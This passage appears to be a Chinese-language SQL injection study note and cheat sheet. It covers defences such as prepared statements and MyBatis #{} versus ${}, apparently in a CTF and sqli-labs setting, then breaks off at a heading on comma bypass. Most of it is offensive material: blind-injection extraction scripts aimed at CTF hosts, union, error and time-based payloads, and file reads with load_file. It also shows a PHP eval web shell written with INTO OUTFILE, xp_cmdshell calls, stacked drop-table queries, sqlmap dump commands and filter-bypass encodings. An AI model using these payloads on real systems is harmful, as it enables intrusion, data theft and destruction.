			'char',
			'ascii',
			'mid',
			'left',
			'right',
			'substring',
			'handler',
			'updatexml',
			'extractvalue',
			'benchmark',
			'insert',
			'update',
			'all',
			'@',
			'#',
			'^',
			'&',
			'*',
			'\'',
			'"',
			'~',
			'`',
			'(',
			')',
			'--',
			'=',
			'/',
			'\\',
			' ']
url = "http://127.0.0.1/get.php"
header = {
	'Host':'127.0.0.1',
	'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0',
	'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
	'Accept-Language':'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
	'Accept-Encoding':'gzip, deflate',
	'Content-Type':'application/x-www-form-urlencoded'
}
for char in sql_char:
	post_data = "query=test"+char+"&submit2=sbumit"
	res = requests.post(url,data=post_data,headers=header)
	if 'Illegal Char' in res.text:
		print("该字符是非法字符: {0}".format(char))
	else:
		print("通过: {0}".format(char))

- - - - -

- etc1 SQL注入的防御

- -

- 1、检查变量数据类型和格式

　　如果你的SQL语句是类似where id={$id}这种形式，数据库里所有的id都是数字，那么就应该在SQL被执行前，检查确保变量id是int类型；如果是接受邮箱，那就应该检查并严格确保变量一定是邮箱的格式，其他的类型比如日期、时间等也是一个道理。总结起来：只要是有固定格式的变量，在SQL语句执行前，应该严格按照固定格式去检查，确保变量是我们预想的格式，这样很大程度上可以避免SQL注入攻击。
　　比如，我们前面接受username参数例子中，我们的产品设计应该是在用户注册的一开始，就有一个用户名的规则，比如5-20个字符，只能由大小写字母、数字以及一些安全的符号组成，不包含特殊字符。此时我们应该有一个check_username的函数来进行统一的检查。不过，仍然有很多例外情况并不能应用到这一准则，比如文章发布系统，评论系统等必须要允许用户提交任意字符串的场景，这就需要采用过滤等其他方案了。

- -

- 2、过滤特殊符号

　　对于无法确定固定格式的变量，一定要进行特殊符号过滤或转义处理。

- -

- 3、绑定变量，使用预编译语句

　　MySQL的mysqli驱动提供了预编译语句的支持，不同的程序语言，都分别有使用预编译语句的方法

　　实际上，绑定变量使用预编译语句是预防SQL注入的最佳方式，使用预编译的SQL语句语义不会发生改变，在SQL语句中，变量用问号?表示，黑客即使本事再大，也无法改变SQL语句的结构

- -

- etc2 预编译

- -

- 1 什么是sql预编译**

1.1：预编译语句是什么　

通常我们的一条sql在db接收到最终执行完毕返回可以分为下面三个过程：

词法和语义解析　　
优化sql语句，制定执行计划
执行并返回结果

我们把这种普通语句称作Immediate Statements。　　

但是很多情况，我们的一条sql语句可能会反复执行，或者每次执行的时候只有个别的值不同（比如query的where子句值不同，update的set子句值不同,insert的values值不同）。
如果每次都需要经过上面的词法语义解析、语句优化、制定执行计划等，则效率就明显不行了。

　　所谓预编译语句就是将这类语句中的值用占位符替代，可以视为将sql语句模板化或者说参数化，一般称这类语句叫Prepared Statements或者Parameterized Statements
　　预编译语句的优势在于归纳为：一次编译、多次运行，省去了解析优化等过程；此外预编译语句能防止sql注入。
　　当然就优化来说，很多时候最优的执行计划不是光靠知道sql语句的模板就能决定了，往往就是需要通过具体值来预估出成本代价。

1.2： MySQL的预编译功能

　　注意MySQL的老版本（4.1之前）是不支持服务端预编译的，但基于目前业界生产环境普遍情况，基本可以认为MySQL支持服务端预编译。

　下面我们来看一下MySQL中预编译语句的使用。
　　（1）建表首先我们有一张测试表t，结构如下所示：

mysql> show create table t\G
*************************** 1. row ***************************
       Table: t
Create Table: CREATE TABLE `t` (
  `a` int(11) DEFAULT NULL,
  `b` varchar(20) DEFAULT NULL,
  UNIQUE KEY `ab` (`a`,`b`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8

- - - -

　（2）编译

　　我们接下来通过 PREPARE stmt_name FROM preparable_stm的语法来预编译一条sql语句

1
2
3

mysql> prepare ins from 'insert into t select ?,?';
Query OK, 0 rows affected (0.00 sec)
Statement prepared

- -

　（3）执行

　　我们通过EXECUTE stmt_name [USING @var_name [, @var_name] ...]的语法来执行预编译语句

mysql> set @a=999,@b='hello';
Query OK, 0 rows affected (0.00 sec)
 
mysql> execute ins using @a,@b;
Query OK, 1 row affected (0.01 sec)
Records: 1  Duplicates: 0  Warnings: 0
 
mysql> select * from t;
+------+-------+
| a    | b     |
+------+-------+
|  999 | hello |
+------+-------+
1 row in set (0.00 sec)

- - - -

　　可以看到，数据已经被成功插入表中。

　　MySQL中的预编译语句作用域是session级，但我们可以通过max_prepared_stmt_count变量来控制全局最大的存储的预编译语句。

mysql> set @@global.max_prepared_stmt_count=1;
Query OK, 0 rows affected (0.00 sec)
 
mysql> prepare sel from 'select * from t';
ERROR 1461 (42000): Can't create more than max_prepared_stmt_count statements (current value: 1)

- -

当预编译条数已经达到阈值时可以看到MySQL会报如上所示的错误。

（4）释放
　　如果我们想要释放一条预编译语句，则可以使用{DEALLOCATE | DROP} PREPARE stmt_name的语法进行操作:

1 2	mysql> deallocate prepare ins; Query OK, 0 rows affected (0.00 sec)

- - -

- 2：为什么PrepareStatement可以防止sql注入

　　原理是采用了预编译的方法，先将SQL语句中可被客户端控制的参数集进行编译，生成对应的临时变量集，再使用对应的设置方法，为临时变量集里面的元素进行赋值，赋值函数setString()，会对传入的参数进行强制类型检查和安全检查，所以就避免了SQL注入的产生。下面具体分析

　（1）：为什么Statement会被sql注入

　　因为Statement之所以会被sql注入是因为SQL语句结构发生了变化。比如：

1 2	"select*from tablename where username='"+uesrname+ "'and password='"+password+"'"

- -

　　在用户输入’or true or’之后sql语句结构改变。

1	select*from tablename where username=''or true or'' and password=''

- -

　　这样本来是判断用户名和密码都匹配时才会计数，但是经过改变后变成了或的逻辑关系，不管用户名和密码是否匹配该式的返回值永远为true;

　（2）为什么Preparement可以防止SQL注入。

　　因为Preparement样式为

1	select*from tablename where username=? and password=?

- -

　　该SQL语句会在得到用户的输入之前先用数据库进行预编译，这样的话不管用户输入什么用户名和密码的判断始终都是并的逻辑关系，防止了SQL注入

　　简单总结，参数化能防注入的原因在于，语句是语句，参数是参数，参数的值并不是语句的一部分，数据库只按语句的语义跑，至于跑的时候是带一个普通背包还是一个怪物，不会影响行进路线，无非跑的快点与慢点的区别。

- -

- 3：mybatis是如何防止SQL注入的

　　1、首先看一下下面两个sql语句的区别：

<select id="selectByNameAndPassword" parameterType="java.util.Map" resultMap="BaseResultMap">
select id, username, password, role
from user
where username = #{username,jdbcType=VARCHAR}
and password = #{password,jdbcType=VARCHAR}
</select>

- - - -

<select id="selectByNameAndPassword" parameterType="java.util.Map" resultMap="BaseResultMap">
select id, username, password, role
from user
where username = ${username,jdbcType=VARCHAR}
and password = ${password,jdbcType=VARCHAR}
</select>

- - - -

mybatis中的#和$的区别：

　　1、#将传入的数据都当成一个字符串，会对自动传入的数据加一个双引号。
如：where username=#{username}，如果传入的值是111,那么解析成sql时的值为where username=”111”, 如果传入的值是id，则解析成的sql为where username=”id”.　
　　2、$将传入的数据直接显示生成在sql中。
如：where username=${username}，如果传入的值是111,那么解析成sql时的值为where username=111；
如果传入的值是;drop table user;，则解析成的sql为：select id, username, password, role from user where username=;drop table user;
　　3、#方式能够很大程度防止sql注入，$方式无法防止Sql注入。
　　4、$方式一般用于传入数据库对象，例如传入表名.
　　5、一般能用#的就别用$，若不得不使用“${xxx}”这样的参数，要手工地做好过滤工作，来防止sql注入攻击。
　　6、在MyBatis中，“${xxx}”这样格式的参数会直接参与SQL编译，从而不能避免注入攻击。但涉及到动态表名和列名时，只能使用“${xxx}”这样的参数格式。所以，这样的参数需要我们在代码中手工进行处理来防止注入。**
【结论】在编写MyBatis的映射语句时，尽量采用“#{xxx}”这样的格式。若不得不使用“${xxx}”这样的参数，要手工地做好过滤工作，来防止SQL注入攻击。**

- -

- 4 mybatis是如何做到防止sql注入的

　　MyBatis框架作为一款半自动化的持久层框架，其SQL语句都要我们自己手动编写，这个时候当然需要防止SQL注入。其实，MyBatis的SQL是一个具有“输入+输出”的功能，类似于函数的结构，参考上面的两个例子。其中，parameterType表示了输入的参数类型，resultType表示了输出的参数类型。回应上文，如果我们想防止SQL注入，理所当然地要在输入参数上下功夫。上面代码中使用#的即输入参数在SQL中拼接的部分，传入参数后，打印出执行的SQL语句，会看到SQL是这样的：

1	select id, username, password, role from user where username=? and password=?

- -

　　不管输入什么参数，打印出的SQL都是这样的。这是因为MyBatis启用了预编译功能，在SQL执行前，会先将上面的SQL发送给数据库进行编译；执行时，直接使用编译好的SQL，替换占位符“?”就可以了。因为SQL注入只能对编译过程起作用，所以这样的方式就很好地避免了SQL注入的问题。

　　【底层实现原理】MyBatis是如何做到SQL预编译的呢？其实在框架底层，是JDBC中的PreparedStatement类在起作用，PreparedStatement是我们很熟悉的Statement的子类，它的对象包含了编译好的SQL语句。这种“准备好”的方式不仅能提高安全性，而且在多次执行同一个SQL时，能够提高效率。原因是SQL已编译好，再次执行时无需再编译

- -

- 脚本

- -

- sql布尔盲注

url = "http://124.156.121.112:28069/?id=-1'/**/"
def db(url):                    #爆库名
    for i in range(1,5):
        for j in range(32,128):
            u= "or/**/ascii(substr(database()/**/from/**/"+str(i)+"/**/for/**/1))="+str(j)+"#"
            s = url+u
            print(s)
            r =  requests.get(s)
            if 'By Rudyard Kipling' in r.text:
                print(chr(j))
                
def table(url):                    #爆表名
    for i in range(4):
        table_name=''
        for j in range(1,6):
            for k in range(48,128):
                u=id="||/**/ascii(substr((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema=database()/**/limit/**/1/**/offset/**/"+str(i)+")/**/from/**/"+str(j)+"/**/for/**/1))="+str(k)+"#"
                s = url+u
                print(s)
                r =  requests.get(s)            
                if 'By Rudyard Kipling' in r.text:
                    table_name+=chr(k)
            print(table_name)

- - - -

import requests
s=requests.session()
url='https://46a0f98e-cdc3-413d-b67c-b2dbaeb5c4ec.chall.ctf.show/index.php'
table=""

for i in range(1,45):
    print(i)
    for j in range(31,128):
        #爆表名  flag
        payload = "ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))
        #爆字段名 flag
        #payload = "ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666C6167)from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))
        #读取flag
        #payload = "ascii(substr((select/**/flag/**/from/**/flag)from/**/%s/**/for/**/1))=%s#"%(str(i), str(j))

        ra = s.get(url=url + '?id=0/**/or/**/' + payload).text

        if 'I asked nothing' in ra:
            table += chr(j)
            print(table)
            break

- - - -

import requests
s=requests.session()
url='http://ab7573d3-1de2-42bd-bc68-26aaca8af4dc.chall.ctf.show/index.php'
table=""

for i in range(1,45):
    print(i)
    for j in range(31,128):
        #爆表名  flag
        #payload = "ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))
        #爆字段名 flag
        #payload = "ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666C6167)from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))
        #读取flag
        payload = "ascii(substr((select/**/flag/**/from/**/flag)from/**/%s/**/for/**/1))=%s#"%(str(i), str(j))

        ra = s.get(url=url + '?id=0/**/or/**/' + payload).text

        if 'I asked nothing' in ra:
            table += chr(j)
            print(table)
            break

- - - - - - - - - - - -

- SQL注入

攻击总体思路：

1：寻找到SQL注入的位置

2：判断服务器类型和后台数据库类型

3：针对不同的服务器和数据库特点进行SQL注入攻击

- -

- 0x00 SQL基本语法

MySQL开启远程连接 GRANT ALL PRIVILEGES ON *.* TO ‘用户名‘@’%’ IDENTIFIED BY ‘密码’ WITH GRANT OPTION;

- -

- 0 表的用途

MySQL

information_schema.schemata 存放所有数据库
    schema_name 数据库名称

information_schema.tables 存放所有数据库的表
    table_schema 数据库名称
    table_name 表名称
    
information_schema.columns 存放所有数据库的列
    table_schema 数据库名称
    table_name 表名称
    column_name 列名称

- - - - -

- 1 SELECT

SELECT * FROM 数据库.表

- -

- 2 INSERT

INSERT INTO table_name (column_list) VALUES (value_list);

- -

- 3 UPDATE

UPDATE subDomainDic SET type4domain=NULL,dic_target=0,domain_target=NULL WHERE dic_target=1;

- -

- 4 DELETE

DELETE FROM table_name WHERE predicate;

- -

- 5 基本函数

MySQL

mid
substr
group_concat
Load_file(file_name):读取文件并返回该文件的内容作为一个字符串。

- - -

- 6 基本语句

显示版本：select version();
显示字符集：select @@character_set_database;
显示数据库show databases;
显示表名：show tables;
显示计算机名：select @@hostname;
显示系统版本：select @@version_compile_os;
显示mysql路径：select @@basedir;
显示数据库路径：select @@datadir;
显示root密码：select User,Password from mysql.user;
开启外连：GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;

- - - - -

- x 中间件容器解析的区别

index.php?id=1&id=2
apache（php）解析最后一个参数，即显示id=2的内容。
Tomcat（jsp）解析第一个参数，即显示id=1的内容。

- -

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Web服务器	参数获取函数	获取到的参数
PHP/Apache	$_GET(“par”)	Last
JSP/Tomcat	Request.getParameter(“par”)	First
Perl(CGI)/Apache	Param(“par”)	First
Python/Apache	getvalue(“par”)	All(list)
ASP/IIS	Request.QuertString(“par”)	All(comma-delimited string)

- -

- 不同数据库的注入判断

# Oracle
'+UNION+SELECT+'abc','def'+FROM+dual--
# 显示数据库版本： 
'+UNION+SELECT+BANNER,+NULL+FROM+v$version--


# MSSQL
'+UNION+SELECT+'abc','def'#
'UNION+SELECT+@@version,+NULL--+a
# 检索数据库中的表列表： '+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--

- - - - - - -

- 0x01 SQL注入基础

- -

- 1 常规注入

爆数据库

1	?id=1 and 1=2 union select 1,2,group_concat(schema_name) from information_schema.schemata--

- -

爆数据表

1	?id=1') and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

- -

爆数据列

1	?id=1') and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+

- -

爆数据

1	?id=1') and 1=2 union select 1,group_concat(username),group_concat(password) from security.users--+

- -

查看是否具有读取权限

1 2	# 如果结果返回正常,说明具有读写权限。 select (select count(*) from mysql.user)>0;

- -

读文件

Select 1,2,3,4,5,6,7,hex(replace(load_file(char(99,58,92,119,105,110,100,111,119,115,92,114,101,112,97,105,114,92,115,97,109)))

利用hex()将文件内容导出来，尤其是smb文件时可以使用。
-1 union select 1,1,1,load_file(char(99,58,47,98,111,111,116,46,105,110,105))
Explain：“char(99,58,47,98,111,111,116,46,105,110,105)”就是“c:/boot.ini”的ASCII代码
-1 union select 1,1,1,load_file(0x633a2f626f6f742e696e69)
Explain：“c:/boot.ini”的16进制是“0x633a2f626f6f742e696e69”
-1 union select 1,1,1,load_file(c:\\boot.ini)
Explain:路径里的/用\\代替

- -

文件导入

1	?id=1')) UNION SELECT 1,2,'<?php@eval($_post[“mima”])?>' into outfile "c:\\wamp\\www\\sqllib\\Less-7\\yijuhua.php"--+

- - - - -

- 3 基于时间的盲注

if判断

# if表达式 如果a表达式为真，则执行b表达式，为假则执行c表达式
if(a, b, c)
?id=2' or if(1,sleep(2),1)--+

and (SELECT 7621 FROM (SELECT(SLEEP(5)))fjCb)--+
and (SELECT * FROM (SELECT(if(1,sleep(5),1)))aaa)#
AND (SELECT 7684 FROM (SELECT(SLEEP(5)))mRcs)

- -

利用sleep函数进行注入

1 2	# 若为假则延时五秒 ?id=1'and If(ascii(substr(database(),1,1))=115,1,sleep(5))--+

- -

利用BENCHMARK()进行延时注入

1
2

# 当结果正确的时候，运行ENCODE('MSG','by5seconds')操作50000000次，会占用一段时间。
?id=1'UNION SELECT(IF(SUBSTRING(current,1,1)=CHAR(115),BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null)),2,3 FROM(select database() as current)as tb1--+

- - - - -

- 4 基于布尔的盲注

# rand()布尔判断
rand(true), rand(false)
?sort=rand(ascii(left(database(),1))=115)

###
select rand(ascii(left(database(),1))=115);
+-------------------------------------+
| rand(ascii(left(database(),1))=115) |
+-------------------------------------+
|                 0.40540353712197724 |
+-------------------------------------+
select rand(true);
+---------------------+
| rand(true)          |
+---------------------+
| 0.40540353712197724 |
+---------------------+

# buer
id=(SELECT (CASE WHEN (9647=9647) THEN 14 ELSE (SELECT 6297 UNION SELECT 2981) END))

- -

判断数据库版本第一位

1	?id=1' and left(version(),1)=5--+

- -

判断数据库长度

1	?id=1' and length(database())=8--+

- -

判断数据库第一位

1	?id=1' and left(database(),1)>'a';--+

- -

判断数据库第一位ascii

1	?id=1' and ascii(left(database(),1))>100--+

- -

布尔盲注获取数据表信息

1
2
3

substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)
# limit 0,1限制显示第一个表 substr限制数据结果的位数显示
# 可组合其他函数使用，如ascii

- - - - -

- 5 报错注入

xpath函数报错

# extractvalue
?id=1' and extractvalue(1,concat(0x7e,(select @@version),0x7e))--+
# updatexml
?id=1' and updatexml(1,concat(0x7e,(select @@version),0x7e),1)--+

- - - -

1
2
3

AND GTID_SUBSET(CONCAT(0x717a6a7071,(SELECT (ELT(2101=2101,1))),0x71716a6b71),2101)--

(SELECT 0x526e5452 WHERE 8019=8019 AND GTID_SUBSET(CONCAT(0x7171787671,(SELECT (ELT(5727=5727,1))),0x716b7a7171),5727))

- - - -

# 数据库数量
admin' AND GTID_SUBSET(CONCAT(0x716b7a7071,(SELECT IFNULL(CAST(COUNT(schema_name) AS NCHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),0x71627a7671),8132)-- gqgS

# CAST 转换数据类型
CAST(COUNT(schema_name) AS NCHAR)
将COUNT(schema_name)转换为NCHAR型

- - - -

floor(rand(0)*2)

?id=1' union Select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a--+

?sort=(select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2)))--+

?sort=1'and (select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2)))--+

- -

double数值类型超出范围进行报错注入

1	?id=1' union select (exp(~(select * FROM(SELECT USER())a))),2,3--+

- -

bigint溢出

1	?id=1' union select (!(select * from (select user())x) - ~0),2,3--+

- -

利用数据的重复性

1	?id=1' union select 1,2,3 from(select NAME_CONST(version(),1),NAME_CONST(version(),1))x--+

- - -

- 6 宽字节注入

mysql在使用GBK编码的时候，会认为两个字符为一个汉字，例如%aa%5c就是一个汉字（前一个ascii码大于128才能到汉字的范围）。我们在过滤’的时候，往往利用的思路是将‘转换为\’（转换的函数或者思路会在每一关遇到的时候介绍）。
因此我们在此想办法将‘前面添加的\除掉，一般有两种思路：
1、%df吃掉\具体的原因是urlencode(‘\)=%5c%27，我们在%5c%27前面添加%df，形成%df%5c%27，而上面提到的mysql在GBK编码方式的时候会将两个字节当做一个汉字，此事%df%5c就是一个汉字，%27则作为一个单独的符号在外面，同时也就达到了我们的目的。
2、将\’中的\过滤掉，例如可以构造%**%5c%5c%27的情况，后面的%5c会被前面的%5c给注释掉。这也是bypass的一种方法。

- -

此处过滤使用函数addslashes()
addslashes()函数返回在预定义字符之前添加反斜杠的字符串。
预定义字符是：
单引号（'）
双引号（"）
反斜杠（\）
提示：该函数可用于为存储在数据库中的字符串以及数据库查询语句准备字符串。Addslashes()函数和我们在32关实现的功能基本一致的，所以我们依旧可以利用%df进行绕
过。
Notice：使用addslashes(),我们需要将mysql_query设置为binary的方式，才能防御此漏洞。Mysql_query(“SET character_set_connection=gbk,character_set_result=gbk,character_set_client=binary”,$conn);

- - - - - -

1 2	# sqlmap跑法 sqlmap -u "http://192.168.18.12/sqlilab/Less-32/?id=1" --batch --risk=3 --level=3 --random-agent - -dbs -v 3 --tamper unmagicquotes

- - -

- 7 堆叠注入

适用：MySQL, SQLServer, PostgreSQL

不适用：Oracle

1 原理
在SQL中，分号（;）是用来表示一条sql语句的结束。试想一下我们在;结束一个sql语句后继续构造下一条语句，会不会一起执行？因此这个想法也就造就了堆叠注入。而unioninjection（联合注入）也是将两条语句合并在一起，两者之间有什么区别么？区别就在于union或者unionall执行的语句类型是有限的，可以用来执行查询语句，而堆叠注入可以执行的是任意的语句。
Select * from products where productid=1;DELETE FROM products

2 堆叠注入的局限性
堆叠注入的局限性在于并不是每一个环境下都可以执行，可能受到API或者数据库引擎不支持的限制，当然了权限不足也可以解释为什么攻击者无法修改数据或者调用一些程序。

- -

mysql

# 新建一个表
select * from users where id=1;create table test like users;
show tabkes;
# 删除上面新建的test表
select * from users where id=1;drop table test;
# 查询数据
select * from users where id=1;select 1,2,3;
# 加载文件
select * from users where id=1;select load_file('c:/tmpupbbn.php');
# 修改数据
select * from users where id=1;insert into users(id,username,password) values('100','new','new');

- - - -

sqlserver

# 增加数据表
select * from test;create table sc3(ss CHAR(8));
# 删除数据表
select * from test;drop table sc3;
# 查询数据
select 1,2,3;select * from test;
# 修改数据
select * from test;update test set name='test' where id=3;
# 存储过程的执行
select * from test where id=1;exec master..xp_cmdshell 'ipconfig'

- -

PostgreSQL

# 增加数据表
select * from user_test;create table user_data(id DATE);
select * from user_data;
# 删除新建的user_data表
select * from user_test;delete from user_data;
# 查询数据
select * from user_test;select 1,2,3;
# 修改数据
select * from user_test;update user_test set name='modify' where name='张三';

- - -

- 8 创建/上传文件

1 2	# 创建文件内容为 <?phpphpinfo();?> 16进制 ?sort=1'into outfile "c:\\wamp\\www\\sqllib\\test.php"lines terminated by 0x3c3f70687020706870696e666f28293b3f3e2020--+

- - - - -

- 9 搜索型注入

原理：

1	$sql="select * from user where password like '%$pwd%' order by password";

- -

这句SQL的语句就是基于用户输入的pwd在users表中找到相应的password，正常用户当然会输入例如admin,ckse等等。但是如果有人输入这样的内容呢？

1	'and 1=1 and '%'='

- -

这样的话这句SQL语句就变成了这样：

1	select * from user where password like '%fendo'and 1=1 and '%'='%' order by password

- -

搜索型注入判断

1 搜索keywords‘，如果出错的话，有90%的可能性存在漏洞；

2 搜索 keywords%，如果同样出错的话，就有95%的可能性存在漏洞；

3 搜索keywords% ‘and 1=1 and ‘%’=’（这个语句的功能就相当于普通SQL注入的 and 1=1）看返回的情况

4 搜索keywords% ‘and 1=2 and ‘%’=’（这个语句的功能就相当于普通SQL注入的 and 1=2）看返回的情况

5 根据两次的返回情况来判断是不是搜索型文本框注入了

下面这几种语句都可以:

'and 1=1 and '%'='

%' and 1=1--'

%' and 1=1 and '%'='

- -

实战

1)get型注入

测试源码：

<?
   $pwd=$_GET['pwd'];
   $conn=mysql_connect("127.0.0.1","root","123");//连接mysql数据库
   if($conn){
   	echo "连接数据库成功!"; 
   }//判断连接是否成功
   echo "<br>";
   mysql_select_db('fendo',$conn);//选择连接请求为conn的数据库（fendo）
   $sql="select * from user where password like '%$pwd%' order by password"; //字符型搜索语句
   $result=mysql_query($sql);
   while($row = mysql_fetch_array($result)){ 
   	echo "用户ID：".$row['id']."<br >";
   	echo "用户名：".$row['username']."<br >";
   	echo "用户密码：".$row['password']."<br >";
   	echo "用户邮箱：".$row['email']."<br >";
   }
   mysql_close($conn); //关闭数据库连接
   echo "<hr>";
   echo "你当前执行的sql语句为："."<br >";
   echo $sql;
   ?>

- -

1、判断字段数

1	%' union select 1,2,3,4,...... and '%'='

- -

还有种方法
语句:

1	%' and exists (select id from user where LENGTH(username)<6 and id=1) and '%'='

- - -

把6这个数字逐次更换,直到他不报错为止。如下当它小于6时正确,说明字段数为5。

2、判断表名

语句:

1	%'and(select count(*)from admin)>0 and '%'='

- -

把admin这个表名逐次更换,直到他不报错为止,就说明这个表存在。

3、猜解密码

2)post型注入

测试源码：

<?  

//--------------------------post处理--------------------------------//  

$name=addslashes($_POST['n']);   

$pass=addslashes($_POST['p']);  

$conn = mysql_connect('127.0.0.1','root','123');   

if($conn){  

    echo "mysql连接成功";  

    echo "<hr>";    

}  

mysql_select_db('fendo',$conn);    

$sql="select * from user where username='$name' and password='$pass'";  

$result=mysql_query($sql);  

mysql_close($conn);  

while($row = mysql_fetch_array($result)){  

    echo "用户ID：".$row['id']."<br >";  

    echo "用户名：".$row['username']."<br >";  

    echo "用户密码：".$row['password']."<br >";  

}  

echo "当前执行的sql语句：".$sql;  

?>  

 

<form action="" method="POST">  

账号：<input name="n" type="text" /><br><br>  

密码：<input name="p" type="text" /><br><br>  

<input name="" type="submit" value="提交" />  

 

</form>

- -

1、判断是否存在SQL注入

用PHP万能密码进行测试

' or 1=1#

- - -

在用户名里输入万能密码如果没报错,就说明存在SQL注入。

2、猜字段数

1	' order by 4#

- - -

逐次更改数字去猜,直到不报错为止。

3、猜表名

1	'or 1=1 union select 1,2,3,4 #

- - -

逐次累加数字,直到不报错为止。

4.猜内容

替换1,2,3为你想要获得的内容

1	'or 1=1 union select username,password,3,4 from user#

- - - - -

- 10 insert/update型注入点

# 布尔注入
Parameter: sex (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: sex=a' RLIKE (SELECT (CASE WHEN (5274=5274) THEN 0x61 ELSE 0x28 END))-- sQlU&phonenum=a&add=a&email=a&submit=submit
    Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
    
# 报错注入
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: sex=a' AND EXTRACTVALUE(3124,CONCAT(0x5c,0x716b767a71,(SELECT (ELT(3124=3124,1))),0x7162626a71))-- bRMD&phonenum=a&add=a&email=a&submit=submit
    Vector: AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))
    
# 延时注入
    Type: time-based blind
    Title: MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)
    Payload: sex=a' RLIKE (SELECT 6187 FROM (SELECT(SLEEP(5)))jLem)-- yIsA&phonenum=a&add=a&email=a&submit=submit
    Vector: RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

- - - - - - -

- *sqlmap用法

获取数据库信息

1	sqlmap -u "http://192.168.18.12/sqlilab/Less-9/?id=1" --batch --level=3 --risk=3 --dbs

- -

获取数据表信息

1	sqlmap -u "http://192.168.18.12/sqlilab/Less-9/?id=1" --batch --level=3 --risk=3 -D security --tables

- -

获取列信息

1	sqlmap -u "http://192.168.18.12/sqlilab/Less-9/?id=1" --batch --level=3 --risk=3 -D security -T em ails --columns

- -

读取数据

1	sqlmap -u "http://192.168.18.12/sqlilab/Less-9/?id=1" --batch --level=3 --risk=3 -D security -T us ers --C id,username,password --dump

- - - -

1 2	# http头注入 sqlmap.py -u “url” --host * --thread=1 --batch -v 1 --delay=0.7 --dbms mysql --current-db --current-user --dbs

- - - - - - -

- 0x02 绕过及过滤闭合

- -

- 1、绕过

- -

- 1 注释符绕过

常用注释符：

//,
-- ,
/**/,
#,
--+,
-- -,
;,%00,
--aUNION /**/ Select /**/user，pwd，from userU/**/ NION /**/ SE/**/ LECT /**/user，pwd from user

- -

绕过注释符号（#，–）过滤：

id=1'union select 1,2,3||'1

最后的or '1闭合查询语句的最后的单引号，或者：

id=1'union select 1,2,'3

- - - - -

- 2 or and 绕过

and=&& or=||
（1）大小写变形Or,OR,oR
（2）编码，hex，urlencode
（3）添加注释/*or*/
（4）利用符号and=&&or=||

- - - - -

- 2 大小写绕过

1	?id=1+UnIoN/**/SeLeCT

- - -

- 3 内联注释绕过

1	id=1/!UnIoN/+SeLeCT+1,2,concat(/!table_name/)+FrOM /information_schema/.tables /!WHERE /+/!TaBlE_ScHeMa/+like+database()-- -

- -

通常情况下，上面的代码可以绕过过滤器，请注意，我们用的是 Like而不是 =

- -

- 4 双关键字绕过

1	?id=1+UNIunionON+SeLselectECT+1,2,3–

- - -

- 5 编码绕过

如URLEncode编码，ASCII,HEX,unicode编码绕过

or 1=1即%6f%72%20%31%3d%31，而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。

十六进制编码SELECT(extractvalue(0x3C613E61646D696E3C2F613E,0x2f61))双重编码绕过

select load_file('0x2f6574632f706173737764');
python
>>> '/etc/passwd'.encode('hex')
'2f6574632f706173737764'

?id=1%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/1,2,password%252f%252a*/FROM%252f%252a*/Users--+

一些unicode编码举例：  

单引号：'%u0027 %u02b9 %u02bc%u02c8 %u2032%uff07 %c0%27%c0%a7 %e0%80%a7

空白：%u0020 %uff00%c0%20 %c0%a0 %e0%80%a0

左括号(:%u0028 %uff08%c0%28 %c0%a8%e0%80%a8

右括号):%u0029 %uff09%c0%29 %c0%a9%e0%80%a9

- -

十六进制引号绕过

users的十六进制的字符串是7573657273。那么最后的sql语句就变为了：

1	selectcolumn_namefrominformation_schema.tableswheretable_name=0x7573657273

- - - - -

- 6 空格绕过

两个空格代替一个空格，用Tab代替空格

%20 +
%09 tab键（水平）
%0a 新建一行
%0b tab键（垂直）
%0c 新建一页
%0d return功能
%a0 空格
/**/

- -

括号绕过空格在MySQL中，括号是用来包围子查询的。因此，任何可以计算出结果的语句，都可以用括号包围起来。而括号的两端，可以没有多余的空格。

1	select(user())from dual where 1=1 and 2=2;

- - - - -

- 7 逗号绕过

